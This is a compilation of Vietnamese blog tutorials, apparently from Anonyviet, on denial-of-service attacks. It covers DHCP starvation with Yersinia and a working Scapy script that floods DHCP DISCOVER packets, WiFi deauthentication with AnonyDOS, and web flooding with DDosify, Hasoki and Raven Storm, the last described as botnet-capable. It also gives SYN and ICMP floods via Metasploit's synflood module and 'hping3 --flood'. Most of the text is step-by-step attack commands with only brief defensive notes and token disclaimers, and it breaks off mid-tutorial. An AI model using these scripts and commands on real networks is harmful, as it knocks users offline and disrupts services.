Tấn công DoS vào máy chủ DHCP

DHCP là một giao thức dùng để cấu hình tự động các thiết bị. Thông thường, chúng là các thiết bị đầu cuối như máy tính, điện thoại hoặc máy in nhận địa chỉ IP, mask, default gateway,  DNS,… nhờ DHCP.

Nhưng điều gì sẽ xảy ra khi ai đó ngăn cản cơ chế này hoạt động? Sẽ không có kết nối mạng cũng như kết nối internet. Chúng ta gọi kiểu tấn công này là tấn công DoS (Tấn công từ chối dịch vụ).

Cuộc tấn công được gọi là “tấn công đói DHCP” dựa trên thực tế là mỗi máy chủ DHCP có số lượng địa chỉ IP được xác định chính xác có thể được cấp cho các thiết bị. Ví dụ: mạng con có thể là 192.168.0.0/24, đại diện cho một phạm vi tối đa là 253 địa chỉ có thể sử dụng cho máy khách.

Nhưng khi kẻ tấn công yêu cầu tất cả các địa chỉ IP có sẵn bằng cách ghi đè một số lượng lớn các địa chỉ MAC không có thật, máy chủ sẽ không có bất kỳ địa chỉ IP nào cung cấp cho các thiết bị mới.

Cuộc tấn công này thậm chí còn tạo cơ hội cho kẻ tấn công nắm bắt được lưu lượng truy cập. Sau khi tắt máy chủ DHCP, kẻ tấn công có thể chuyển sang máy chủ DHCP của riêng mình. Ví dụ: một máy chủ DNS giả mạo có thể được cung cấp trong cấu hình DHCP để tấn công bạn. Mình thấy đây là một cuộc tấn công nguy hiểm.

Mô phỏng cuộc tấn công

Mình sẽ cho bạn thấy cách thực hiện cuộc tấn công này dễ như thế nào. Mình sẽ sử dụng router và laptop của Cisco với bản phân phối KALI Linux để thử nghiệm. Mình sẽ sử dụng một công cụ có tên là Yersinia.

Cấu hình cơ bản của máy chủ DHCP trên bộ định tuyến CISCO

ip dhcp excluded-address 192.168.0.1
 !
 ip dhcp pool LAN
 network 192.168.0.0 255.255.255.0
 default-router 192.168.0.1
 dns-server 8.8.8.8

Sau khi kết nối trạm đầu tiên, mình thấy một địa chỉ IP được chỉ định.

R1-NETVEL#show ip dhcp binding

Mình cũng thấy một lượng nhỏ các yêu cầu DHCP đến với bộ định tuyến.

R1-NETVEL#show ip dhcp server statistics

Và chỉ một địa chỉ IP được chỉ định

R1-NETVEL#show ip dhcp pool

Khởi động cuộc tấn công

Mình sẽ sử dụng công cụ Yersinia. Bạn cũng có thể thực hiện việc này thông qua CLI, nhưng trong trường hợp này, mình thích GUI hơn. Bạn có thể mở nó bằng lệnh sau.

root@kali:~#yersinia -G

Hoặc bạn cũng có thể khởi động cuộc tấn công bằng vài cú click chuột thông qua giao diện đồ hoạ.

Bắt đầu: Khởi động cuộc tấn công -> gửi gói KHÁM PHÁ

Dừng: Liệt kê các cuộc tấn công -> Hủy cuộc tấn công

Sau một thời gian, máy chủ DHCP sẽ có nhiều yêu cầu hơn khả năng nó có thể xử lý. Đó là tấn công DoS.

R1-NETVEL#show ip dhcp binding

R1-NETVEL#show ip dhcp server statistics

R1-NETVEL#show ip dhcp pool

Như chúng ta thấy, cách tấn công tương đối đơn giản, nhưng rất nguy hiểm. Nó có thể được ngăn chặn bằng nhiều cách, chẳng hạn như giới hạn số lượng địa chỉ MAC đi qua cổng (bảo mật cổng) hoặc nếu chúng ta muốn ngăn kẻ tấn công cung cấp máy chủ DHCP của riêng mình, chúng ta có thể triển khai DHCP snooping.

Câu hỏi thường gặp

Tấn công “đói DHCP” là gì và nó hoạt động như thế nào?

Tấn công “đói DHCP” là một loại tấn công DoS (từ chối dịch vụ) nhắm vào máy chủ DHCP. Kẻ tấn công gửi một lượng lớn yêu cầu địa chỉ IP giả mạo, làm cạn kiệt nguồn địa chỉ IP khả dụng của máy chủ và ngăn cản các thiết bị hợp pháp nhận được địa chỉ IP, dẫn đến mất kết nối mạng.

Tôi có thể làm gì để bảo vệ mạng của mình khỏi tấn công “đói DHCP”?

Bạn có thể áp dụng các biện pháp như giới hạn số lượng địa chỉ MAC được phép truy cập, triển khai DHCP snooping để kiểm soát lưu lượng DHCP, và sử dụng các giải pháp tường lửa để lọc các yêu cầu DHCP bất thường.

Công cụ nào được sử dụng trong bài viết để mô phỏng cuộc tấn công “đói DHCP”?

Bài viết sử dụng công cụ Yersinia trên hệ điều hành Kali Linux để mô phỏng cuộc tấn công. Yersinia cung cấp giao diện đồ họa thuận tiện để thực hiện và quản lý cuộc tấn công.

Đây là một phương thức tấn công giữa vào bộ định tuyến và thiết bị kết nối. Không những vậy, cuộc tấn công này cực kì tàn ác buộc các thiết bị của nạn nhân kết nối với một điểm truy cập vào mạng của hacker sau đó hacker có thể nắm bắt các gói mạng được truyền giữa máy của nạn nhân và các điểm truy cập khác, người ta còn có tên gọi khác là kiểu tấn công Evil Twin Attack. Nhưng tool này chỉ là một công cụ chỉ hỗ trợ DOS WiFi, chứ không tạo được điểm truy cập giả. Vậy còn chờ gì nữa chúng ta hãy khám phá tool thú vị này nhé

Lưu ý: Công cụ này chỉ mang mục đích thử nghiệm và nghiên cứu vui lòng các bạn không sử dụng tool này vào mọi hành vi xấu. Các mọi hành vi bất hợp pháp của các bạn thì Anonyviet sẽ không chịu trách nhiệm

Cài đặt và sử dụng công cụ AnonyDOS

Để cài đặt công cụ chúng ta hãy mở terminal và nhập lệnh sau:

git clone https://github.com/sonvan1811/AnonyDOS.git

cd AnonyDOS

sudo python3 AnonyDOS.py

sau khi cài đặt xong chúng ta chạy tool với quyền sudo:sudo python3 AnonyDOS.py

Khi bạn mở tool ra thì sẽ có yêu cầu là cắm bộ điều hợp wifi của bạn vào thì mới dùng được tool nha. Còn ai chưa có bộ điều hợp thì có thể mua một con TP LINK W722N và cài driver cho nó tại đây. Và ở đây thì mình đã cắm bộ điều hợp mạng rùi nên mình sẽ chọn bộ điều hợp đó là số 0.

Sau khi các bạn chọn bộ điều hợp mạng xong thì tool sẽ tiến hành quét các wifi ở xung quanh. Để dừng scan thì các bạn nhấn tổ hợp phím Ctrl + C để dừng và sau đó chọn mạng mà bạn muốn tấn công

Sau khi chọn mạng tấn công, công cụ này sẽ chạy một câu lệnh cơ bản của aircrack-ng đó là aireplay-ng nó sẽ bắt đầu gửi liên tục gói tin đến mạng WiFi bị tấn công dẫn đến tình trạng không thể kết nối mạng và các thiết bị kết nối sẽ bị đẩy ra khỏi mạng đó hay còn gọi là DOS WiFi

Đúng là một công cụ thú vị nhỉ. Mình cũng xin nhắc lại rằng không nên sử dụng tool này vào mục đích xấu nha, thay vì đó bạn hãy nghiên cứu code và làm quen các module của Python sẽ tốt hơn rất nhiều 

Bạn có thể đọc thêm bài viết Cách cài driver usb wifi tp-link wn722n cho kali linux bằng rtl8188eus script trên Anonyviet

Câu hỏi thường gặp

AnonyDOS hoạt động như thế nào?

AnonyDOS sử dụng phương thức WiFi Deauth để tấn công mạng WiFi, gửi liên tục các gói tin làm gián đoạn kết nối và đẩy các thiết bị ra khỏi mạng. Nó không tạo điểm truy cập giả mạo.

Tôi cần những gì để sử dụng AnonyDOS?

Bạn cần một bộ điều hợp WiFi (ví dụ như TP-LINK W722N) và đã cài đặt driver phù hợp. Cần quyền truy cập root (sudo) để chạy công cụ.

Tôi có thể sử dụng AnonyDOS vào mục đích gì?

Công cụ này chỉ dành cho mục đích nghiên cứu và thử nghiệm. Việc sử dụng AnonyDOS vào các hoạt động bất hợp pháp là trái pháp luật và người dùng tự chịu trách nhiệm.

Dos là gì? DDos là gì? Sự khác nhau giữa Dos và DDos

• DoS là tấn công làm nghẽn máy chủ từ 1 IP/nguồn duy nhất
• DDoS là tấn công từ nhiều IP khác nhau mục tiêu.

Như vậy có thể thấy DDoS sẽ có mức nguy hiểm gấp nhiều lần sao với DoS, và khả năng ngăn chặn DDoS cũng khó hơn.

Các bạn có thể xem thêm tài liệu tại bài viết: Tấn công DDoS là gì?

DDosify là gì? Công dụng của nó là gì?

Vậy thì hãy đi tới công cụ được giới thiệu của bải viết này: DDosify. Nó cho phép người sử dụng tiến hành các cuộc kiểm thử sức chịu đựng của website trong thời gian ngắn và trả về báo cáo cho chúng ta.

Tới hiện tại, DDosify đã hỗ trợ các cuộc tấn công vào các giao thức HTTP, HTTPS, HTTP/2. Trong tương lai, họ sẽ phát triển thêm các giao thức mới hơn và không chỉ giới hạn ở các cuộc tấn công Layer7 mà còn có cả Layer4. Đồng thời DDosify cũng cung cấp cho chúng ta nhiều loại loadtype để chúng ta có thể tiến hành tấn công.

Hướng dẫn cài đặt và sử dụng cho DDosify

Hướng dẫn cài đặt

Lưu ý: Các bạn hãy chọn cách cài đặt phù hợp với bạn nhất nhé! Không cần phải làm tất cả các cách ở phía bên dưới nhé!

Sử dụng docker

docker run -it --rm ddosify/ddosify

Sử dụng Homebrew

brew install ddosify/tap/ddosify

Sử dụng linux package

# Redhat (Fedora, CentOS, RHEL,...)
rpm -i https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.rpm

# Debian (Ubuntu, Linux Mint,...)
wget https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.deb
dpkg -i ddosify_amd64.deb

# Alpine
wget https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.apk
apk add --allow-untrusted ddosify_amd64.apk

# Arch Linux
git clone https://aur.archlinux.org/ddosify.git
cd ddosify
makepkg -sri

Cài đặt cho window

Câu lệnh khởi chạy .\ddosify.exe

Bước 1: các bạn truy cập vào trang Release page và tìm tới fileddosify_[Số phiên bản]_Windows_[Computer architecture].zip và tải nó về

Bước 2: Các bạn giải nén file zip vừa tải về

Bước 3: Các bạn mở Command Prompt của máy bạn lên và sử dụng lệnh sau trỏ về thư mục đúng của bạn

cd [đường dẫn tới thư mục]

Sử dụng script cài đặt sẵn (Sử dụng cho linux và MacOS

Yêu cầu: Phải có 2 package:Curlvà Sudo

curl -sSfL https://raw.githubusercontent.com/ddosify/ddosify/master/scripts/install.sh | sh 

Sử dụng Go Install

go install -v go.ddosify.com/ddosify@latest

Hướng dẫn sử dụng

Để kiểm tra website, các bạn hãy chạy câu lệnh sau đây

ddosify -t [URL của bạn]

Chẳng hạn mình muốn kiểm tra trang web Anonyviet.com thì câu lệnh của mình là

ddosify -t https://anonyviet.com/

Và đây là kết quả sau khi mình kiểm tra

Cấu trúc câu lệnh sẽ là

ddosify [Flag]

Và các Flag của nó bao gồm:

• t: Mục tiêu của bạn. ví dụ: https://anonyviet.com/
• n: tổng Request mà bạn muốn thử
• d: Thời gian cho chạy phần mềm
• p: Giao thức cần kiểm tra. Bao gồm: HTTP, HTTPS. HTTP/2
• m: Phương thức Request. Bao gồm: GET, POST, PUT, DELETE, HEAD, PATCH, OPTIONS
• b: Payload của network packet.
• a: Basic authentication. Ví dụ: -a username:password
• h: Header của Request. Ví dụ: -h 'Accept: text/html'
• T: Thời gian timeout của từng request
• P: Thêm Proxy cho cuộc kiểm tra. Ví dụ:-P http://user:pass@proxy_host.com:port'
• o: Output của quá trình kiểm tra
• l: Loại của Loadtest. Bao gồm: linear, incremental, waved
• config: Config file. Các bạn có thể xem thêm tại đây
• version: Kiểm tra phiên bản của Ddosify

1 câu lệnh mẫu sử dụng 1 vài chức năng vừa nêu trên

ddosify -t target_site.com -n 1000 -d 20 -p HTTPS -m PUT -T 7 -P http://proxy_server.com:80

Câu hỏi thường gặp

DDosify có an toàn khi sử dụng để kiểm tra website của tôi không?

DDosify là công cụ kiểm tra tải, không phải công cụ tấn công thực sự. Việc sử dụng nó để kiểm tra website của bạn chỉ nhằm mục đích đánh giá khả năng chịu tải, không gây hại nếu sử dụng đúng cách và với cường độ hợp lý.

Tôi có cần kiến thức lập trình để sử dụng DDosify?

Không cần thiết. DDosify cung cấp giao diện dòng lệnh đơn giản, dễ sử dụng. Bạn chỉ cần hiểu các tham số cơ bản để thực hiện lệnh kiểm tra.

DDosify hỗ trợ những loại tấn công nào?

Hiện tại, DDosify hỗ trợ các cuộc tấn công vào giao thức HTTP, HTTPS, HTTP/2. Nhà phát triển đang tiếp tục cập nhật và bổ sung các giao thức khác trong tương lai.

Bài viết ngày hôm nay cũng không có gì đặc biệt nên mình sẽ kết thúc sớm !

Trong bài viết này hôm nay, mình sẽ giới thiệu cho các bạn một tool DDoS Website mang tên HASOKI, đây là một công cụ mới ra mắt và được sử dụng trên Windows và Linux. Công cụ này được xây dựng bởi tác giả Cutipu và được đăng tải trên Github. Không chỉ vậy, Hasoki được viết hoàn toàn 100% ngôn ngữ lập trình Python. Trước khi vào bài viết mình muốn các bạn DDoS là gì ? thì hãy đọc tại đây nha. Bạn nào muốn tìm hiểu thêm về các phương pháp DDoS của Hasoki thì hãy vào Github này. Giờ thì vào vấn đề chính thôi !!!

Hasoki – DDoS Website cho Windows và Linux

Để cài tool cho Windows thì các bạn hãy tải ở đây sau đó giải nén và mở CMD trỏ đến thư mục đó, rồi nhập lệnh cài đặt:

python setup.py install hoặc python3 setup.py install

Bạn cũng có thể dùng lệnh này để cài đặt: pip install -r requirements.txt hoặc pip3 install -r requirements.txt

Trên Linux thì các bạn cài đặt như sau:

git clone https://github.com/BacNTb/HASOKI

cd HASOKI

python setup.py installhoặc python3 setup.py install

python main.py hoặc python3 main.py

Sau khi chạy lệnh file main.py thì giao diện của tool DDoS sẽ hiện lên trong khá đẹp đấy =)). Để bắt đầu vào một cuộc tấn công các bạn nhập help sau đó chọn các hình thức tấn công. Ở đây mình chọn layer7 để ddos website

Tại đây, các bạn có rất nhiều lựa chọn hình thức tấn công khác nhau, và mình sẽ chọn hình thức sky để bắt đầu cuộc tấn công. Bạn hãy nhập địa chỉ website, nhập số lượng tấn công vừa phải kẻo bị lag máy và sau đó là chọn thời gian ddos

Và sau đây là kết quả của cuộc tấn công:

Vậy là hết rồi, mình mong các bạn nên sử dụng tool này vào mục đích tốt thôi nhé. Chào tạm biệt ^^

Bạn có thể đọc thêm bài viết Raven Storm – DDos Toolkit bằng Python tại Anonyviet 

Câu hỏi thường gặp

Hasoki hoạt động trên hệ điều hành nào?

Hasoki hoạt động trên cả Windows và Linux.

Tôi có thể cài đặt Hasoki như thế nào?

Hướng dẫn cài đặt chi tiết có sẵn trong bài viết. Tóm tắt: Trên Windows, sử dụng python setup.py install hoặc pip install -r requirements.txt. Trên Linux, clone repository từ Github, sau đó sử dụng python setup.py install và python main.py.

Hasoki có hỗ trợ loại tấn công nào?

Bài viết đề cập đến tấn công Layer7 và ví dụ sử dụng phương thức “sky”. Để biết thêm chi tiết về các loại tấn công khác, vui lòng tham khảo tài liệu trên Github của Hasoki.

Raven Storm – DDos toolkit

Raven Storm được phát triển bởi Taguar258 trên GitHub. Raven Storm là 1 dạng của DDos Toolkit hay còn được gọi là Bộ công cụ để DDos (các bạn có thể tham khảo về DDos là gì trong bài GoldenEye – Tool kiểm tra sức chịu đựng DOS của Website tại đây) . Toolkit là 1 dạng Tool tổng hợp nhiều chức năng của nhiều công cụ khác và Raven Storm được tổng hợp từ Nmap, Aircrack và BlueZ. Các tính năng nỏi bật của Raven Storm bao gồm:

• Raven Storm bao gồm tool cho phép bạn kích hoạt với shortcut và tăng sự hiệu quả của tool lên cao hơn so với thông thường
• Raven Storm rất hiệu quả trong việc đánh sập Host Và Server
• Giúp người sử dụng hiểu được về các dạng DDos (Layer 3, Layer 4, Layer7)
• Có thể giúp người dùng kết nối với các Clients để tạo Botnet
• Có thể tấn công nhiều protocol hay các giao thức khác nhau như UDP/TCP, ICMP, HTTP, L2CAP, ARP và IEEE.

Các Module Raven Strom sử dụng

• Ping -> L3
• Dịch vụ udp/tcp -> L4
• websites -> L7
• Thiết bị lân cận -> arp
• Thiết bị Bluetooth -> BL
• Wifi -> Wifi (các bạn cần Card wifi hỗ trợ RFMON hoặc USB Wifi có hỗ trợ Hack Wifi)
• Botnet -> Server

Chú ý: Hãy thử sử dụng L4 nếu L7 không hoạt động

Một số lưu ý trước khi thực hiện

• Tuyệt đối không Dos/DDos Anonyviet và những Website bạn không thuộc quyền sở hữu hay quản lý. Anonyviet sẽ không chịu trách nhiệm với các hành vi phá hoại của các bạn.
• Chỉ được sử dụng Tool để kiểm thử hệ thống của bạn
• Sử dụng Tool này với số lượng Thread vừa phải tránh việc máy có thể bị Lag hoặc treo ngay lập tức
• Sử dụng Tool Trên các hệ điều hành Linux

Hướng dẫn sử dụng Raven Storm

Cài đặt

Các bạn chạy lệnh sau để cài tất cả Tool và phần mềm trong 1 câu lệnh

curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s

Sử dụng

Để khởi động Chương Trình, Các bạn chạy câu lệnh sau:

sudo rst

Giao diện của Tool

Mình sẽ thử tấn công website sử dụng Module L7

Đầu tiên nhập l7 vào terminal

Đầu tiên các bạn Set target bằng câu lệnh sau

target

sau khi nhập xong thì các bạn nhập URL của website nhé

Tiếp theo Set Threads bằng câu lệnh sau

Threads

Sau khi nhập xong thì nhập số thread mà bạn mong muốn

Để khởi động chạy lệnh sau

run

Vậy là mình vừa hướng dẫn sử Raven Storm DDos Toolkit bằng python. Anh em thấy tool này có hữu dụng không? Hãy để lại bình luận phía bên dưới để mình biết nhé. Xem thêm: Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website tại đây.

Câu hỏi thường gặp

Raven Storm hoạt động trên hệ điều hành nào?

Raven Storm hoạt động tốt nhất trên hệ điều hành Linux.

Tôi có thể sử dụng Raven Storm để tấn công bất kỳ website nào không?

Không. Chỉ sử dụng Raven Storm để kiểm thử hệ thống của bạn hoặc trên các hệ thống mà bạn có quyền truy cập đầy đủ. Việc sử dụng công cụ này để tấn công các website khác mà không có sự cho phép là bất hợp pháp.

Nếu Module L7 không hoạt động, tôi nên làm gì?

Hãy thử sử dụng Module L4.

Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục, vui lòng các bạn không nên thực hiện những hành vi xấu liên quan đến pháp luật. Anonyviet sẽ không chịu trách nhiệm bất cứ hành vi bất hợp pháp !

DoS DHCP ATTACK 

Đây là một kiểu tấn công yêu cầu tất cả các địa chỉ IP bằng cách ghi đè một số lượng lớn địa chỉ MAC không có thật, máy chủ sẽ không có bất kì địa chỉ IP nào cho các thiết bị. Mình thấy cuộc tấn công này rất nguy hiểm, nó còn tạo cho hacker có cơ hội nắm bắt được các lưu lượng truy cập. Nếu hacker đã tấn công làm cho máy chủ DHCP ngừng hoạt động, lúc này hacker có thể tạo ra một máy chủ DHCP cho riêng mình. Cụ thể là các DNS giả mạo có thể đã được cung cấp cấu hình DHCP và sau đó hacker có thể xâm phạm bạn bất cứ lúc nào mà bạn không hề biết. Cuộc tấn công này kết hợp với các cuộc tấn công Man-In-The-Middle(Tấn Công Xen Giữa) thì cực kì nguy hiểm luôn.

Tấn công DoS máy chủ DHCP đơn giản bằng Python

Để thực hiện cuộc tấn công DoS này, bạn hãy mở terminal và nhập lệnh sau pip install scapy hoặc pip3 install scapy sau đó tạo một file có phần mở rộng là .py rồi  copy đoạn code sau:

#!/usr/bin/env python3
from scapy.all import *

dhcp_attack = Ether(dst='ff:ff:ff:ff:ff:ff',src=RandMAC())  \
                     /IP(src='0.0.0.0',dst='255.255.255.255') \
                     /UDP(sport=68,dport=67) \
                     /BOOTP(op=1,chaddr = RandMAC()) \
                     /DHCP(options=[('message-type','discover'),('end')])

sendp(dhcp_attack,iface='wlan0',loop=1,verbose=1)

Ở đoạn code ngắn trên, mình đã gọi module scapy vừa tải về sau đó mình đã tạo một biến có tên là dhcpt_attack , trong biến đó mình đã thiết lập cho cuộc cấn tông bao gồm địa chỉ mac và ip giả tại Ether và IP còn lại là mình đã thiết lập cổng và random địa chỉ mac sau đó là phần cài đặt gói gửi đến máy chủ DHCP. Tại dòng code cuối thì các bạn hãy điều chỉnh iface của các bạn vào nhé. Hiện tại mình đang dùng iface đang kết nối với mạng nhà mình là wlan0 nên mình sẽ đặt iface là wlan0. Còn iface của các bạn là gì thì hãy đặt vô nha

Sau khi làm xong tất cả các bước trên. Bây giờ bạn chỉ cần mở terminal và trỏ đến file .py mà các bạn vừa tạo, ở đây mình đã đặt tên file là dhcp.py nên mình sẽ chạy lệnh sau để bắt đầu một cuộc tấn công DoS vào máy chủ DHCP python3 dhcp.py. Còn đây là kết quả của cuộc tấn công DoS DHCP nè

Các bạn có thể thấy trong ảnh đó, các gói tin của cuộc tấn công gửi đến máy chủ DHCP rất nhanh, khiến cho hệ thống chập chờn dẫn đến là mất kết nối internet. Thật là kinh đúng không nào !

Cách ngăn chặn tấn công DoS máy chủ DHCP

Để ngăn chặn các cuộc tấn công DoS vào máy chủ DHCP, hãy bật tính năng DHCP snooping trên thiết bị và sau đó đặt số lượng truy cập tối đa máy khách DHCP được phép trên thiết bị hoặc giao diện. Chỉ số lượng máy khách DHCP được phép mới có thể lấy địa chỉ IP thông qua thiết bị hoặc giao diện.

Bạn có thể bật thiết bị để kiểm tra xem địa chỉ MAC trong tiêu đề khung Ethernet có khớp với giá trị của trường CHADDR trong thông báo DHCP hay không. Nếu hai giá trị khớp nhau, tin nhắn sẽ được chuyển tiếp. Nếu không, tin nhắn sẽ bị hủy.

Vì vậy mình mong rằng bạn học được điều gì đó từ bài viết này và cũng mong rằng các bạn cũng không nên sử dụng vào các mục đích xấu từ cuộc tấn công DoS này he. Chúc các bạn có một ngày tốt lành và làm việc hiệu quả ! Bye Bye

Câu hỏi thường gặp

Tôi có thể sử dụng mã Python này cho mục đích gì?

Mã Python trong bài viết này chỉ được dùng cho mục đích giáo dục và nghiên cứu về bảo mật. Việc sử dụng mã này cho bất kỳ hoạt động bất hợp pháp nào đều bị nghiêm cấm.

Làm thế nào để ngăn chặn cuộc tấn công DoS vào máy chủ DHCP?

Bật tính năng DHCP snooping trên thiết bị mạng và đặt giới hạn số lượng máy khách DHCP được phép truy cập. Thiết bị sẽ kiểm tra sự khớp giữa địa chỉ MAC và CHADDR trong gói DHCP để ngăn chặn các gói tin giả mạo.

Scapy là gì và tôi cần cài đặt nó như thế nào?

Scapy là một thư viện Python dùng để chế tạo và phân tích các gói tin mạng. Bạn có thể cài đặt nó bằng lệnh pip install scapy hoặc pip3 install scapy trong terminal.

Trong bài viết này, mình sẽ hướng dẫn cho các bạn cách tấn công DoS hoặc DDoS với công cụ Metasploit và Hping3 nhé. Những cách thức thực hiện khá là đơn giản và nhanh gọn, chỉ chưa đầy 3 phút bạn cũng đã có thể tạo ra một cuộc tấn công khá mạnh mẽ với số lượng Packets được gửi đi rất nhanh khiến cho máy của nạn nhân dẫn đến tình trạng tăng CPU đột ngột, mạng bị chập chờn hoặc bị nặng hơn là treo máy. Vì vậy mình khuyên các bạn nên test với số lượng packets vừa đủ là ok rồi. Còn bây giờ mình sẽ giới thiệu sơ qua về Metasploit và Hping3.

Metasploit 

Là một công cụ có tên gọi đầy đủ là Metasploit Framework đây là công cụ khai thác các lỗ hổng bảo mật được sử dụng nhiều nhất trên thế giới. Không những thế, còn giúp cho các nhà bảo mật thử nghiệm các cuộc thâm nhập và xác minh các lỗ hổng bảo mật sau đó họ sẽ đánh giá về lỗ hổng và nâng cao nhận thức về bảo mật. Metasploit được viết ngôn ngữ Ruby và nhiều ngôn ngữ khác như: Python, C,… để tạo ra các cuộc khai thác và tấn công trên nhiều loại hệ thống khác nhau như: Windows, Linux, WordPress,…vv. Như vậy, mình đã giới thiệu qua xong về Metasploit rùi. Ngoài ra, bạn cũng có thể dụng Metasploit để tấn công mạng, hack Windows từ xa, hoặc đột nhập máy tính trong các bài viết của Anonyviet nhé ^^.

Xem tất cả bài viết về cách sử dụng Metasploit để tấn công kiểm thử hệ thống.

Hping3

Là một công cụ mạng có thể gửi các gói ICMP/UDP/TCP (tùy bạn chỉnh nha) và hiển thị các câu trả lời đích giống như Ping thực hiện với các câu trả lời ICMP. Ngoài ra, nó còn xử lý phân mảnh và kích thước và nội dung gói tùy ý, có thể được sử dụng để truyền tệp theo các giao thức được hỗ trợ. Việc sử dụng Hping3, bạn có thể kiểm tra các tường lửa, thực hiện quét các cổng giả mạo, kiểm tra hiệu suất mạng bằng nhiều thức khác nhau, và thực hiện các hành động giống như theo dõi trong các giao thức khác. Hping3 được viết ngôn ngữ Tcl

Tìm hiểu rõ hơn về Hping3 tại đây

Để hiểu về tấn công DoS hoặc DDoS bạn có thể đọc bài viết đó tại đây. Không luyên thuyên nữa vào vấn đề luôn nào ^^

Cách tạo ra một cuộc tấn công DoS đơn giản bằng Metasploit và Hping3

Metasploit và Hping3 là công được giới thiệu trong chương trình CEH

Tấn công DoS với Metasploit

Ở bài viết này, mình sẽ chỉ cho các bạn cách tấn công DoS bằng phương pháp SYN Flood nhé. Còn ai chưa hiểu rõ cách tấn công này có thể tìm hiểu ở đây Để thực hiện cuộc tấn công trước tiên hãy mở Terminal lên và nhập lệnh msfconsole

Tiếp theo chúng ta nhập dòng lệnh use auxiliary/dos/tcp/synflood trên thanh Terminal của Metasploit

Tiếp đến, bạn nhập show options để hiện thị các phần cài đặt tùy chỉnh

Ở đây, chúng ta chú ý đến phần:

• NUM: số lượng Packet cần gửi
• RHOSTS: Địa chỉ IP máy tính của nạn nhân
• RPORT: Cổng đang hoạt động trên máy tính của nạn nhân
• SHOST: Địa chỉ IP bất kì mà bạn muốn đặt. Ví dụ địa chỉ IP bất kì mình muốn đặt là: 172.0.0.1
• SPORT: Cổng bất kì ( Phần này không cần cũng được )
• TIMEOUT: Thời gian chờ

Bước tiếp đến là chúng ta sẽ tiến hành cài đặt cuộc tấn công này

• set RHOSTS <ip máy tính nạn nhân>
• set RPORT <cổng máy tính nạn nhân đang hoạt động>
• set NUM <số lượng Packets cần gửi>
• set SHOST <ip giả mạo>
• set TIMEOUT <thời gian chờ>

Tại đây mình đã cài đặt cho cuộc tấn công như sau

• set rhosts 192.168.0.112
• set rport 80
• set num 0
• set shost 172.0.0.1
• set timeout 10000

Để bắt đầu cuộc tấn công chúng ta chỉ cần nhập exploitrồi nhấn Enter để bắt đầu tấn công

Bạn nào không biết cổng nào đang hoạt động trên máy tính nạn nhân chúng ta sẽ sử dụng Nmap để quét cổng nhé.

nmap -p <cổng cần quét> <ip máy tính nạn nhân>hoặc nmap -sV <ip nạn nhân>

Ví dụ: nmap -p 443 192.168.0.112 hoặc namp -sV 192.168.0.112

Sau đây là kết quả của cuộc tấn công

Chúng ta có thể sử dụng công cụ Wireshark để bắt các Packets đang gửi. Giờ đến phần tiếp theo nào ^.^

Tấn công DoS với Hping3

Cách thức thực hiện khá là nhanh và đơn giản. Chỉ với một câu lệnh ngắn bạn đã tạo ra một cuộc tấn công khá mạnh mẽ rồi.

Câu lệnh sẽ như sau: hping3 <ip máy nạn nhân> --flood và sau đây là kết quả nè

Uầy, Nếu như mà chúng ta kết hợp cả Metasploit và hping3 tấn công vào một máy thì không biết kết quả sẽ như thế nào nhỉ ?

Vậy là mình đã chỉ dẫn xong rồi nhé. Còn bây giờ xin chào và tạm biệt các bạn. Chúc các bạn có một lành tốt lành và làm việc học tập hiệu quả !

Bạn có thể đọc thêm bài viết Cách viết Tools DDoS đơn giản bằng Python 

Câu hỏi thường gặp

Metasploit và Hping3 là gì và chúng hoạt động như thế nào trong cuộc tấn công DoS?

Metasploit là một framework khai thác bảo mật cho phép thực hiện các cuộc tấn công DoS. Hping3 là một công cụ mạng gửi các gói tin với tốc độ cao, gây quá tải mạng và làm sập dịch vụ. Trong bài viết, cả hai công cụ được sử dụng để thực hiện một cuộc tấn công DoS bằng cách gửi một lượng lớn các gói tin tới máy nạn nhân.

Tôi có thể sử dụng các công cụ này để tấn công bất kỳ máy nào không?

Không. Việc sử dụng các công cụ này để tấn công các hệ thống mà bạn không có quyền truy cập là bất hợp pháp. Bài viết này chỉ nhằm mục đích giáo dục và minh họa cách thức hoạt động của các cuộc tấn công DoS. Bạn chỉ nên thực hiện các thử nghiệm trên hệ thống của riêng mình hoặc hệ thống mà bạn đã được cho phép.

Có cách nào để phòng tránh các cuộc tấn công DoS không?

Có nhiều biện pháp phòng tránh, bao gồm sử dụng tường lửa, hệ thống phát hiện và ngăn chặn xâm nhập (IDS/IPS), và các kỹ thuật giảm thiểu tấn công DoS như rate limiting. Việc thiết lập các chính sách bảo mật mạnh mẽ cũng rất quan trọng.

Lưu ý 2: Bài viết này để các bạn làm quen với Python và các Module Python, chứ không phải viết Tool DDoS để đi tấn công người khác, khi viết xong, tuyệt đối không sử dụng Tool lên hệ thống không phải do bạn của bạn quản lý.

Lưu ý 3: Thật ra đây là Tool DoS, không phải DDoS, mình ghi DDoS trong tiêu đề để các bạn dễ phân biệt giữa Deny of service và MS-DOS

Hôm nay mình sẽ hướng dẫn cho các bạn cách làm tool TCP Flood đơn giản bằng Python. Đây là 1 công cụ khá là mạnh, có thể khiến máy các bạn hoặc máy các bạn mà muốn tấn công sẽ tràn ngập 1 số gói rác được gửi đến và khiến cho CPU tăng cao lên đến 100%. Nếu máy nào yếu thì chắc sẽ bị sập hoặc mua máy mới quá.

Trước khi vào viết tools thì mình muốn cho các bạn hiểu biết về Dos và nâng cao của DoS là DDoS. Vậy, Dos là gì? Và cách thức hoạt động của DoS ra sao? Bạn cần đọc kỹ bài DDOS là gì trước khi thực hành nội dung bên dưới.

Bắt đầu viết Tool DDoS đơn giản bằng Python

Đầu tiên các bạn phải Download Python. Các bạn có thể lên Youtube xem cách tải, tải Python cũng khá đơn giản lên mình cũng không hướng dẫn trong bài viết này.

Cài đặt Python: ở màn hình cài đầu tiên nhớ check vào dòng Add python x.x to path

Bây giờ các bạn mở CMD trên máy Windows lên và nhập lệnh: pip install termcolor , đây là thư viện màu chữ thôi, còn ai không thích có thể bỏ qua.

Do đây là Tool DoS, sử dụng tài nguyên từ Modem và PC của bạn nên chỉ hoạt động tốt trong môi trường mạng LAN, nếu tấn công ra bên ngoài thì khá yếu và đôi khi bị phản dame nhé.

Ok, giờ thì các bạn sẽ import các module sau:

